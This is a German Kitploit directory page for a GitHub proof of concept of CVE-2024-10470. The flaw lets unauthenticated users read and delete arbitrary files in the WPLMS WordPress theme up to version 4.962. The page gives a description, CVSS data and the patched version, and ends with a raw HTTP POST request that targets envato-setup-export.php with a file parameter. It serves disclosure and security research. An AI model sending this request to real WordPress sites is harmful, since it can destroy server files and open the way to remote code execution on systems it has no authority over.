Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10470 — WPLMS Learning Management System für WordPress <= 4.962 – Nicht authentifiziertes beliebiges Lesen und Löschen von Dateien | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-10470
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubrandomrobbiebf/cve-2024-10470

CVE-2024-10470

WPLMS Learning Management System für WordPress <= 4.962 – Nicht authentifiziertes beliebiges Lesen und Löschen von Dateien

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-10470

WPLMS Learning Management System for WordPress <= 4.962 – Nicht authentifiziertes beliebiges Lesen und Löschen von Dateien

Beschreibung

Das WPLMS Learning Management System for WordPress, ein WordPress LMS-Theme für WordPress, ist anfällig für beliebiges Lesen und Löschen von Dateien aufgrund unzureichender Dateipfadüberprüfung und Berechtigungsprüfungen in den readfile- und unlink-Funktionen in allen Versionen bis einschließlich 4.962. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien auf dem Server zu löschen, was leicht zu einer Remotecodeausführung führen kann, wenn die richtige Datei gelöscht wird (z. B. wp-config.php). Das Theme ist anfällig, selbst wenn es nicht aktiviert ist.

root@kitploit:~
Affected Theme: WPLMS Learning Management System for WordPress
Theme Slug: wplms
Affected Versions: <= 4.962
CVE ID: CVE-2024-10470
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Foxyyy
Fully Patched Version: 4.963

POC

root@kitploit:~
POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

download_export_zip=1&zip_file=.htaccess
Tool herunterladen